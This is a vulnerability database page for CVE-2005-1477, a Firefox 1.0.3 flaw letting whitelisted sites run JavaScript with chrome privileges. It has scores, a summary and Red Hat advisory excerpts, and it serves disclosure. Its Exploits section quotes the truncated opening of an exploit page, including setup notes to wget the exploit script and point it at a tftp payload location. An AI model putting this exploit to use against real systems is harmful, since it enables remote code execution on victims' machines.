5.1
CVSSv2

CVE-2005-1477

Published: 09/05/2005 Updated: 11/10/2017
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

The install function in Firefox 1.0.3 allows remote web sites on the browser's whitelist, such as update.mozilla.org or addon.mozilla.org, to execute arbitrary Javascript with chrome privileges, leading to arbitrary code execution on the system when combined with vulnerabilities such as CVE-2005-1476, as demonstrated using a javascript: URL as the package icon and a cross-site scripting (XSS) attack on a vulnerable whitelist site.

Vulnerable Product Search on Vulmon Subscribe to Product

mozilla firefox 1.0.3

Vendor Advisories

Synopsis mozilla security update Type/Severity Security Advisory: Important Topic Updated mozilla packages that fix various security bugs are now availableThis update has been rated as having important security impact by the RedHat Security Response Team[Updated 24 May 2005]This erratum now includes updat ...
Synopsis firefox security update Type/Severity Security Advisory: Important Topic Updated firefox packages that fix various security bugs are now availableThis update has been rated as having important security impact by the RedHat Security Response Team Description Mozilla Firefox is an ...

Exploits

<!-- 1) wget githubcom/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/986js (05072005js) 2) change src= below 3) edit index and change tftp location /str0ke --> <html><head><title>hide me bitch</title> <meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT"> <s ...